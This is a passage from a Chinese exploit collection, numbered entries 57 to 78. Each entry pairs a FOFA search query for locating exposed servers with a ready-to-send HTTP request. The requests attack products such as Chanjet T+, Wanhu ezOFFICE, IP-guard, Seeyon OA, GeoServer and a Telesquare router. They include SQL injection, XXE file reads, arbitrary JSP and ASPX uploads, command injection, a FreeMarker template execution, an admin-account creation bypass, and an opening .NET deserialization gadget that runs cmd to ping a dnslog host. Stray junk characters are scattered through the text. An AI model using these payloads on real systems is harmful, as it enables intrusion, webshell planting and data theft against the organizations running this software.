{" M2 `' V/ N3 I# s- _4 ~
"storeID":{
# O4 h* ^# ?4 E* B) [- h7 z+ F1 ^ "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",- T: B) O3 I4 { M# b* z% `
"MethodName":"Start",
K' b2 u2 X4 X "ObjectInstance":{( T! u, A* h! w. N Q6 P+ g
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 {; e( f% P. J" C: Y6 ~2 l
"StartInfo": {) z) x+ T9 z, E |8 K
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
3 V. T, I7 m+ {# y6 ~ "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"$ W( [# [, S8 a4 M- _
} W* I ~( Q; D0 L( C3 h
}
- _+ m8 M) m& ]! N3 g }
' I! C" R& A+ e3 d}
! l) ~4 [. \# i
/ A# V& f& ^* `4 D: @3 f! k) b" b% r2 Y# ?
57. 畅捷通T+ keyEdit.aspx SQL注入
+ K1 K+ o' P K0 v7 r, QFOFA:app="畅捷通-TPlus"
9 O. n* A/ J9 w; {+ V7 k4 J/ `GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1# x4 M1 |% _ O0 m
Host: host; }* u8 Q N* }' B8 ]
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ n4 o; O# y z
Accept-Charset: utf-8% w5 u3 K! Y" z+ N& P: q! M
Accept-Encoding: gzip, deflate* A" A9 z, r1 g4 ]
Connection: close
$ P$ _! |* y- d$ N: C2 T& N8 g. X( g, b; P/ v+ g, i5 _ W! ^
]$ f: b4 m$ s. [
58. 畅捷通T+ KeyInfoList.aspx sql注入
3 q2 F& N: M, N- _( Z1 bFOFA:app="畅捷通-TPlus"# l& O+ \! ~% c0 n: G% g% `
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1! l, d; a' u U- t
Host: your-ip
5 a9 ~5 l* {& M( {" EUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 ~( U% q& ?) G& Z/ sAccept-Charset: utf-8
' D2 J' O6 M% ^0 e1 E7 _Accept-Encoding: gzip, deflate
. d' u) r; P: k1 t5 p- xConnection: close2 C2 P: {" ]& ` L- }# a
j! H' e8 P2 h2 ?9 n
& B h# }" [$ {1 ]! W' D59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行% ]5 A$ H' @- y2 G. @8 _& R6 U
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd") `: _5 C# s) Q& ~3 r) Z; Y+ ^" x
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.16 F' Z/ G, x# y" @# V! x E* c
Host: 192.168.86.128:90906 J0 {) Q* o' A% `% V" N& a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36$ ]4 T i; D* J7 p$ Z
Connection: close/ i* ~% }$ B% Y8 j' F, a$ M7 m
Content-Length: 1669. ]9 F# a% u( B+ C* ?: }2 k
Accept: */*& A k" I5 _5 O7 Q
Accept-Language: en) |! j M2 r% R* J8 r2 F. f
Content-Type: application/x-www-form-urlencoded! ?5 h) t' s3 `. G3 _* r
Accept-Encoding: gzip
1 }% x: R% b9 t
: F8 {# ?: S( b; M6 ?4 K! Y& nPAYLOAD/ [( \4 r/ U" V8 T5 r9 R* H
4 h1 z! q" F" S' p2 C6 k/ c0 @% B5 w) r8 `4 a5 n# z6 i! D( t0 p" d
60. 百卓Smart管理平台 importexport.php SQL注入
. j; O! g+ a, L @5 @( @FOFA:title="Smart管理平台"5 l1 }+ ], [8 k" o/ }( m
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1. a, o% g9 q4 G7 I4 } _
Host:5 g) k: |9 P, t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 i9 @8 E4 y" z' p8 M! Q, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 g$ z& O( q# n2 u# e, [ n
Accept-Encoding: gzip, deflate
) {9 P: r0 ^4 q) X2 ]2 |Accept-Language: zh-CN,zh;q=0.9
: ?' J* u: q/ {Connection: close8 }7 g3 V5 Q. n/ _
, Z% }& D& K2 a
& }5 ^( h: V9 q: E) ~3 ], {
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
7 u! r2 K. M9 G1 ~7 F* c0 ~FOFA: title="欢迎使用浙大恩特客户资源管理系统"+ y% b) t" j3 b2 F0 |* G
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1: b! {* B q5 V( d/ [0 b% A5 Q: W
Host: x.x.x.x/ C9 J6 R _* c3 X& x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 g. e) B2 T. W: n
Connection: close" r9 Y8 h- }4 l A$ ^! v' J# R
Content-Length: 27
0 X/ s, S3 g# PAccept: */*
1 y0 h- l6 m p. t _/ a$ I' VAccept-Encoding: gzip, deflate
% |% x& x6 I- h6 rAccept-Language: en, D3 n# j9 `+ l2 @4 W$ p8 C
Content-Type: application/x-www-form-urlencoded
. i; a4 G" I9 V# w( ]0 d5 x! L5 J# ~! M) s% @, v( v
8uxssX66eqrqtKObcVa0kid98xa
0 ~( v- @2 G$ L$ F0 [5 p+ Z, X0 p+ [* P3 S
" `6 a3 G6 M5 `% c4 ^+ a. H- f
62. IP-guard WebServer 远程命令执行$ u( L! ~1 t- a, s5 E
FOFA:"IP-guard" && icon_hash="2030860561"5 Q/ ]% r. x& j9 j* E) S2 d. `
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.12 l p5 D" Y( |" `
Host: x.x.x.x
) x( J" o6 J6 x; f; L9 lUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36" _# F3 E2 S. j
Connection: close* V w* t* I* e5 Z* f0 h! }& D2 {
Accept: */*
; F; f5 j1 Z. O1 d1 _( I2 f% I( }Accept-Language: en# \4 i3 w7 m: \( A& E) t U* ^
Accept-Encoding: gzip
( L: U) V- G% C( Z
0 T7 q' P" f3 Q! l# ?7 X1 s1 N9 o8 t, E5 I9 v. K. J L
访问: [" @) j. Q, R8 P( R: e+ B4 @
& m4 K4 N- y: P5 m% {* R3 p: sGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
, T" c; ]. c/ B& }* c8 f7 r! fHost: x.x.x.x
8 N8 L9 t/ m4 E* q' n8 b, f! [
1 I5 K2 d* q) t5 l2 T$ i
9 `/ ~' k( }) X* O8 t0 \; k, g63. IP-guard WebServer任意文件读取( W) V2 v k! L4 w9 b
IP-guard < 4.82.0609.0) y5 d I0 l! C. C- S: g
FOFA:icon_hash="2030860561"
( B7 o9 P) B1 z5 p& O; nPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1/ S% N% d1 N, P; p* V( ^
Host: your-ip
# V$ Y! b) R1 l* a4 a9 s: S3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 X. U/ g' N2 C& v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ M% R' e8 I8 t' r1 p# w& mAccept-Encoding: gzip, deflate
# }) j( I/ X) b# ]' j5 Y( iAccept-Language: zh-CN,zh;q=0.94 Y( h% B* A! s+ `+ s
Connection: close& M Z& \, }3 a9 s8 v* A6 v# Q
Content-Type: application/x-www-form-urlencoded. ~* h7 J, j4 H9 m4 E
7 V) C; K R8 f, Kpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A8 v* R; h; \/ s
- D8 w5 F, ?9 o2 L# ^& e1 _; F
64. 捷诚管理信息系统CWSFinanceCommon SQL注入; X0 q, w( L9 z& S) f
FOFA:body="/Scripts/EnjoyMsg.js"
: s% Q% N8 b* `' t8 Z, u) v" I' ePOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
0 K6 D$ X& u# \3 }# O. H% u7 [Host: 192.168.86.128:9001* `% X) j+ o/ j6 L7 g
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" P8 f' P7 G+ P0 r# |5 c/ G* L2 q1 H
Connection: close
+ |) F9 h6 W3 ?Content-Length: 369( {/ v0 D7 ]8 N2 O! |; Y" x
Accept: */*- i& f' K" a' ?" b" F Y
Accept-Language: en
& X3 J' R0 p4 H7 NContent-Type: text/xml; charset=utf-86 a! U/ E. v' M0 K8 O0 L
Accept-Encoding: gzip- t; K* c/ K& R- W9 W4 ~
: z$ W( K4 @$ y! B<?xml version="1.0" encoding="utf-8"?>3 N- i! G8 N# B8 x
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
9 M6 Y3 m/ ~5 ] L( s2 |<soap:Body>% ~) d' r2 ~, U6 s
<GetOSpById xmlns="http://tempuri.org/">
7 p% ^6 k$ U! ~) N0 d* X <sId>1';waitfor delay '0:0:5'--+</sId>( M# i4 f# _* u! p
</GetOSpById>
; T, V' |+ j9 X5 Y </soap:Body>
2 l4 i2 N5 e2 c0 ^# L: j% V</soap:Envelope>
; r8 L, `) j1 p5 R" K" {0 c" [" M7 k' g) P3 h P8 M2 \1 G, I
, _+ K& }7 Z% K5 R) r) x$ x6 z
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
9 X, e, i5 F) ?+ @ {* B bFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
6 N3 |4 l# U) ~/ j: b F+ M响应200即成功创建账号test123456/123456/ o" [7 B: F, z9 i4 k0 }* ^
POST /SystemMng.ashx HTTP/1.1# O5 ^; Z2 g% n9 g. b2 t
Host:
9 Y' f9 Y2 d9 [. y( dUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% z) x( d) q% K: c' XAccept-Encoding: gzip, deflate* `- @+ A0 b, K- h) H
Accept: */*+ D5 o+ N( ^2 v$ e
Connection: close
2 ]- Y& o3 ~9 a$ @% l+ _Accept-Language: en
) ~" I" j) }$ w* X6 v. P$ TContent-Length: 174
, z/ I1 w+ l. U4 w% A8 I7 k5 b* R' B
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators6 D8 T5 Z N) Q1 v% w, |
5 D* a4 N* E. A3 ]& ^8 x+ s; w" C! E* q- l+ e
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 u7 Z9 H3 ?/ h* y' n2 \$ r
FOFA:app="万户ezOFFICE协同管理平台"
6 i/ K0 L0 Z( B; l: W+ p0 {. F8 k* L$ ~- b+ a
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
1 t" _% \: {* RHost: x.x.x.x
9 R' J+ q9 q; T3 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 Z6 L" g1 }: z. u4 a7 o/ GConnection: close5 E1 d* G/ g9 c3 a
Accept: */*
+ n" h8 L) l; Y, K5 x1 E, IAccept-Language: en
|; B1 z3 G# P I7 w4 W3 ZAccept-Encoding: gzip& Q; l% w$ a& n# L
3 N) q( c$ F d0 A0 N8 k6 O- m
; o* o1 r3 Z9 t; V# u第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
i( o- _. F$ n3 X- ]+ m2 M( r! y
! s' Q) @# c7 K# N' s/ A9 @8 t) A k67. 万户ezOFFICE wpsservlet任意文件上传
& |5 T1 @+ ~7 ?9 B/ R1 ~FOFA:app="万户网络-ezOFFICE"
, s1 X7 w" e9 q) A+ u' |5 O4 M2 A! \, tnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
& k0 d# `' V# o$ M* H" I7 G: oPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
z3 H e" h) Z3 A: fHost: x.x.x.x3 j& }' ~5 z2 Z5 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0$ W% D5 E3 |8 d. Y$ W: w7 ~
Content-Length: 1733 l: [2 r& X( b. n" R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: k9 F3 \" ]. r# q( c8 |
Accept-Encoding: gzip, deflate
8 G$ Z" Z) j3 P. j: K9 ^( uAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
! m( C& B( {1 t7 pConnection: close
8 f" t9 X# J% i g9 I3 X3 XContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
" G4 t8 A" y) C& G1 H# ?7 b* sDNT: 1( V% p6 b, W) x, a# S& d" o# G$ @
Upgrade-Insecure-Requests: 14 j2 i) E& z8 p( {9 t6 s
4 `; k- W. N5 M--ufuadpxathqvxfqnuyuqaozvseiueerp
# ^; c6 P# x7 ^Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
' `, |4 o4 j$ _6 c) g! {, j( a5 T- q {; Z* p
<% out.print("sasdfghjkj");%>
! m3 K- B6 D, S--ufuadpxathqvxfqnuyuqaozvseiueerp--
$ _% h! M- s" Q1 v' f, t& f9 ^7 a" Z( x _5 I
: H, N0 \) x: z1 l
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
: F- B; ~. ^2 P5 P* u2 w
# L7 [3 W0 j1 A; L9 t68. 万户ezOFFICE wf_printnum.jsp SQL注入
9 t( z- G8 B3 J& H4 [FOFA:app="万户ezOFFICE协同管理平台"
; U8 ?# O% Z* e9 R6 p e2 MGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1' W. N5 c: D0 w2 i
Host: {{host}}
! ~5 k& S" M* b6 T( D: OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.369 A) G) [8 U, T7 V6 B# z
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ ~! M" V! f3 `6 Q" L7 f6 KAccept-Encoding: gzip, deflate7 J6 S) S: A$ w+ \
Accept-Language: zh-CN,zh;q=0.9" K$ P# @ A1 j1 G0 K0 C }
Connection: close
9 L. s/ b- h) V, \
, n& N; L: h8 i0 i- h" w+ Z" p% \9 [. b/ e u
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. z0 O% V4 b sFOFA:app="万户ezOFFICE协同管理平台"% Q, b4 }( N2 c) H: @8 ^/ H
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1% y' J% K$ ^+ ~0 Y# c) |! u( v
Host: your-ip
- D( q; F) _ z" g G, C( Q6 PUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, W' ?6 E$ Z* o' ~Accept-Encoding: gzip, deflate7 l8 G0 N/ m1 D' x* Y- M! E& Q2 G
Accept: */*
( I/ | q% ?2 z2 UConnection: keep-alive
- ^0 I, e E u6 ?: L7 J
: v5 _& h0 w6 O& @: @* d
2 Y2 ^! i' R# R# U' i4 H70. 万户ezEIP success 命令执行
" a- P4 Z# X% e/ z. y( V! yFOFA:app="万户网络-ezEIP"5 n7 C* k1 X, ?* c& n/ f( }
POST /member/success.aspx HTTP/1.1- t2 O1 h3 H4 v0 z& F2 I5 i
Host: {{Hostname}}
* w3 _5 ]' D a3 s# g+ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36! {' a9 { X$ F4 _
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=8 Y) t p+ C4 z8 f- S
Content-Type: application/x-www-form-urlencoded" e8 o7 q/ Q% I3 J
TYPE: C
$ a, e: \2 N7 X' A7 K, RContent-Length: 167024 Q( e4 B3 u0 f# U6 O) k
( m( u- K! a- k# P/ Z1 G, i__VIEWSTATE=PAYLOAD
' {4 w) P7 ]8 V% C* q1 e u
& [4 n: i. R2 E7 d+ S0 ?8 y- G: `' G& Y: b* }) j
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
+ W p. n+ }! v" _- JFOFA:body="PM2项目管理系统BS版增强工具.zip"' f4 T1 v4 W3 ^! w j9 N6 \
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1( {- k6 ?1 P- p6 _
Host: x.x.x.xx.x.x.x. ?' m( t2 p1 R4 F% q: z9 \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 E7 E5 z, L l" h! q
Connection: close0 q9 B* M' L W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) r+ v; g0 R, S( H0 E$ g
Accept-Encoding: gzip, deflate" w: w$ s; e8 ^. @7 Q, d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' ]% ^$ u- ?0 P# i: ZUpgrade-Insecure-Requests: 1$ \' \. V! j. v O7 P+ k7 C
" ^) R8 A5 @5 Q3 A8 ^0 D2 A* T1 K: Q: t/ F1 q
72. 致远OA getAjaxDataServlet XXE& e8 G' e6 b9 y- ~! Z9 D; _
FOFA:app="致远互联-OA"! C$ a' G, L. p. B; W. \! w
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1% K6 R7 {. `+ h
Host: 192.168.40.131:80995 B% R! u; K, {5 V
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.365 y* Y7 J* z, C8 Z" ]" o# C
Connection: close
+ E5 `/ l, F, ]Content-Length: 583
4 ^3 p7 d( n" w- _$ ZContent-Type: application/x-www-form-urlencoded
7 ~7 P/ L, t6 x5 ?3 E) VAccept-Encoding: gzip
- j$ v$ A, R/ t0 `( ?. D9 _+ U' S- E5 u- Z. `
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E% S' S Y6 a \9 d5 C
* R) j* F P7 {- P- L* w$ Z; @; ^: @
& Q) m/ u* a( r% o }; f/ `73. GeoServer wms远程代码执行
: v* I/ B4 Z' r- e. i3 c" uFOFA:icon_hash=”97540678”; h" Q3 `5 x: n$ g, c
POST /geoserver/wms HTTP/1.1- @" U4 F/ v, G" h
Host:
* V- ^0 b) F" O, Q& \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 d3 \0 z- _& A" T" l3 V \' j" NContent-Length: 1981
/ A& H4 A; q2 A8 L1 k$ O! R: rAccept-Encoding: gzip, deflate
5 S9 Q1 u; W/ K5 z' Q+ BConnection: close
! e. L) J; s9 t+ Y( ^) x: k, c( JContent-Type: application/xml. D; |$ y" s0 ?
SL-CE-SUID: 31 o6 q& J9 p, Q. k
/ H& y/ T3 f8 s; R# [, l
PAYLOAD* U; ?* B3 S0 X; b& i: p
0 L% n( `) j% E: m, s/ N/ H. o" w( O: P
74. 致远M3-server 6_1sp1 反序列化RCE& t( T4 @* k. P" u' r. W9 C
FOFA:title="M3-Server" ?2 R1 y! {! p
PAYLOAD
' V2 }& A+ {+ t+ i: Z) X/ I9 T( A; j7 j4 e7 F0 n
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE' i8 y Q& W/ r& Q. @
FOFA:app="TELESQUARE-TLR-2005KSH"4 c$ @7 G9 q2 I
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
P1 L+ D& r0 i" H9 k; K RHost: x.x.x.x
3 a8 M3 K2 y" Q3 J- fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ R/ H7 n i% r8 y' h X% q& HConnection: close r$ r1 S/ v8 v6 g. ^
Accept: */*
2 q" G4 r, }2 ?1 U8 S1 D5 fAccept-Language: en* I) t: t" L4 C/ \& }* f
Accept-Encoding: gzip
6 k3 r- L/ v* Z$ P6 D4 x3 T/ Z z z5 m" r8 h
. x/ R8 a+ L3 `3 A' a7 t U3 a
GET /cgi-bin/test28256.txt HTTP/1.1: r+ r/ ~3 C# U7 D2 X2 j
Host: x.x.x.x
: b) R$ J! ?2 V. Q
p3 y$ c- k2 q' d9 \- g; ^$ ^; g" A! |. s( `
76. 新开普掌上校园服务管理平台service.action远程命令执行; A2 Z8 _" M( e; w9 ^$ N+ E6 _
FOFA:title="掌上校园服务管理平台"
! S: o+ D5 l, c0 j; b6 U# wPOST /service_transport/service.action HTTP/1.1
6 y" Q2 y2 n5 B0 r6 }Host: x.x.x.x
8 ^% S; R3 ?! E* e. ~8 \/ MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; ^0 g! J; S7 M) S: F( p- Y5 w7 k
Connection: close* B# N7 |& ^) Q# A/ G
Content-Length: 211! R/ B; v% M0 s1 `3 W' k6 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: s/ Y% L! \+ T$ g1 n& w% ~
Accept-Encoding: gzip, deflate7 d b! o5 q P* _. \9 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 v+ O% C) F& eCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
& w& a a5 x5 R+ f! h0 {Upgrade-Insecure-Requests: 1: v/ T: @ p& Q8 \( L- i
" n2 M* o+ B4 Q( R) V
{% u% G# l2 \& B! o8 }# g% s
"command": "GetFZinfo",5 ?% U+ }, m* o$ T* ^& v
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
( g& N8 {( B" M* Z- k! Y ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
9 Z; F7 g% u j' H}! B6 s6 f) d5 |+ r: s0 r
& p3 W* k) `. X- T
% S9 O! V2 ^2 i1 [* @GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.18 T) n; l7 W& p
Host: x.x.x.x) A( p4 P q6 T0 J& o r( V
0 U* O$ R$ E# ?- m$ i7 X6 k2 E x6 f& P* z$ ? j# S' M( Q2 B
, q9 P. G3 |0 n: W
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ [8 {4 x6 R- T. c" d) g& j! aFOFA:body="F22WEB登陆"# [9 `9 u x: ?% t ?7 M
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1+ `/ ?$ R5 O5 p; _& \7 J
Host: x.x.x.x; ^+ f$ X" f, C+ c, h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 `3 f$ y, X W N$ sConnection: close& o/ t0 f% h: {; o
Content-Length: 433
$ R! M- D2 i( X% E0 F( _Accept: */*/ z6 k) Y7 v. t6 @2 ]
Accept-Encoding: gzip, deflate
- Q: X2 Z9 r. q5 VAccept-Language: zh-CN,zh;q=0.95 b4 } w: ?; y* @# b) e( j7 [
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
& s$ I% K, I8 F# P
) U, R+ I3 I, a# n------------398jnjVTTlDVXHlE7yYnfwBoix
" D9 l* g# u# C% O8 S2 _) D" Y f0 rContent-Disposition: form-data; name="folder": {; R0 V* m* X. _: J* `
- I! Z% e! j5 r$ s9 W9 J& a
/upload/udplog
" @ _: e6 X8 \' [' ~# p0 J------------398jnjVTTlDVXHlE7yYnfwBoix
5 X5 u- v( R0 y; xContent-Disposition: form-data; name="Filedata"; filename="1.aspx"8 s7 c3 k8 M$ |( V/ ?' w
Content-Type: application/octet-stream
% a2 ]! s- u" z) f" k; f* c. C/ w( R5 H! p9 e0 B* e, o7 a p. x
hello1234567& K5 b# Z2 U. c! i8 K/ q } m
------------398jnjVTTlDVXHlE7yYnfwBoix
. L2 L$ {1 A, l4 R, K! WContent-Disposition: form-data; name="Upload": R. t9 a2 C$ X7 M' p) K$ x4 Y% Y
5 F" g7 s7 S* P' c% F# Q
Submit Query
p. }* w( d% N, @% b# q------------398jnjVTTlDVXHlE7yYnfwBoix--
. _+ R* ^! m1 m' q. Q
9 J* P5 j- M: S5 A7 j1 J& f, Q. g# R$ r; x5 F' ^( x% b$ u
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传$ g: D9 d* y% a% ~5 b
FOFA:icon_hash="2001627082"$ \9 e2 z2 O. u" ]- A8 V# E2 x
POST /Platform/System/FileUpload.ashx HTTP/1.16 k/ t# r5 a' v, W7 ]
Host: x.x.x.x
0 G* Y8 `# k: i" l1 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: F1 g( d3 s3 Z5 ?
Connection: close, u$ D7 ^1 }; C1 g
Content-Length: 336- Y+ D2 P3 N( j: H$ ~7 B. v/ w0 B
Accept-Encoding: gzip9 R* O& m' a3 W. C9 r: v
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l$ D" H |; S3 H6 E* d
8 a j: r G# t$ M6 b------YsOxWxSvj1KyZow1PTsh98fdu6l3 P" s" S3 y! y; o0 A
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
+ m& l3 |" Q% I( CContent-Type: image/png
( W6 U% i# H' K) z: d0 d# Q+ N) M) G: m
YsOxWxSvj1KyZow1PTsh98fdu6l1 r* N# H1 O. |7 _' f: Q
------YsOxWxSvj1KyZow1PTsh98fdu6l
5 g( B1 l- Q2 V0 H6 n4 m, aContent-Disposition: form-data; name="target"5 h! u; u8 U! b' V" t
" m$ Q8 m. f* s" a/Applications/SkillDevelopAndEHS/$ a! L6 C8 ^3 V5 U! C; w
------YsOxWxSvj1KyZow1PTsh98fdu6l--, X% o3 E# d4 l' J# @
2 @' f) ~" f5 @$ N
+ D- w' X3 Q, e9 X( v2 A9 bGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
